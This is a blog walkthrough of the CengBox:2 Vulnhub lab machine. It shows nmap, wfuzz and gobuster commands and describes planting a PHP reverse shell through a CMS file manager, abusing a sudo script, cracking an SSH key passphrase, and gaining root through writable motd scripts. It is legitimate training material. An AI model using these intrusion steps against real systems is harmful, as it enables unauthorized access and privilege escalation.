CengBox:2 Vulnhub Walkthrough

Here is my write-up for Cengbox:2 vulnerable machine , an intermediate level machine which can be downloaded from vulnhub.

There are two methods for privilege escalation and we will cover the first and easy one because I really don't like msfconsole sometimes.



walkthrough



IP of the target : 192.168.43.175

as usual we start with nmap to find open ports and running services using the command


sudo nmap -sC -sV -Pn -p- 192.168.43.175

nmap result looks interesting , lets try anonymous login in FTP :)

and we found a note.txt file we downloaded the file in our local system using get command and now lets try to read the content of the file.

we have gained some useful information from this message

  • users : Kevin and Aaron

  • Password : default password ( we can try some common passwords)

  • domain name : ceng-company.vm

so we edit the /etc/hosts file as 192.168.43.175 ceng-company.vm


this is what we have on port 80 , nothing useful :( , now we can think of directory bruteforce using the command


wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt -t 25 --hc 404 http://ceng-company.vm/FUZZ

but unfortunately we have nothing here too.

If we remember the message from note.txt file then we found that ceng-company.vm is a domain , what if there is a subdomain? , okay to find that we ae going to use gobuster


gobuster vhost -u ceng-company.vm -w /usr/share/wordlists/dirb/big.txt

most of them have returned code 400 but two subdomain have returned code 403 , we again edit the /etc/hosts file as 192.168.43.175 admin.ceng-company.vm

okay now it's time for directory bruteforce again :)

okay lets open this directory .

This looks like a CMS and without wasting time the we start searching for some common login webpage like /admin or /login and we found both .

you can find these login pages using directory bruteforce also , but trying some common names revealed the login page so I didn't go for the bruteforce :)

Here is little bit of guess work to get the correct email and password


username : Kevin@ceng-company.vm

password : ***** ( #Try_Harder)

and using these credentials we are in as user Kevin , now by some manual searching we found that we can edit some php files .

Content->File Manager->index.php .

we edit this file with pentestmonkey php reverse shell and started a listener on the specified port and after refreshing the page we get the reverse shell.

okay now lets refresh the page and done we are in as user www-data :)

now we checked for user privileges using command sudo -l.

okay lets run this bash script as user swartz.

sudo -u swartz /home/swartz/runphp.sh

it means we can execute any php command as user swartz , now take the shell of user swartz here I have used a php function pcntl_exec() , you can read more about this function online.

we are in as user swartz , now we changed our directory to /home and found one more user there as mitnick and we can access the home directory of this user and we found a interesting file there.

we copied the id_rsa keys to our local system and tried to connect to user mitnick using this key as


ssh -i id_rsa mitnick@192.168.43.175

It is asking for the id_rsa passphrase , we an crack it using john and found the password to be leg*****

we again tried to connect to user mitnick by using same ssh command and this time we are in .

now we just transfered the pspy64 binary into /tmp and then by setting the correct permission lets run it.

okay this one looks interesting we change our directory to /etc/update-motd.d/


means we can write these files , so we created a file inside the home directory of user mitnick with content

now we edit the file /etc/update-motd.d/00-header as

now the question is why we are doing this ? 00-header or some other files inside that directroy are not running as cronjob by root user then how we will get the shell of root user? okay the thing is motd runs on every SSH login and files inside the /etc/update-motd.d/ we will executed by root so we exit from the current session and started a listener on specified port and again try to connect to ssh as user mitnick and this gives us the shell of user root.

lets check if we got the shell of user root or not .

okay we are root now and this completes our challenge , Hope you like the walkthrough and don't forget to try the Donate option so that we can keep our website advertisement free :)

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.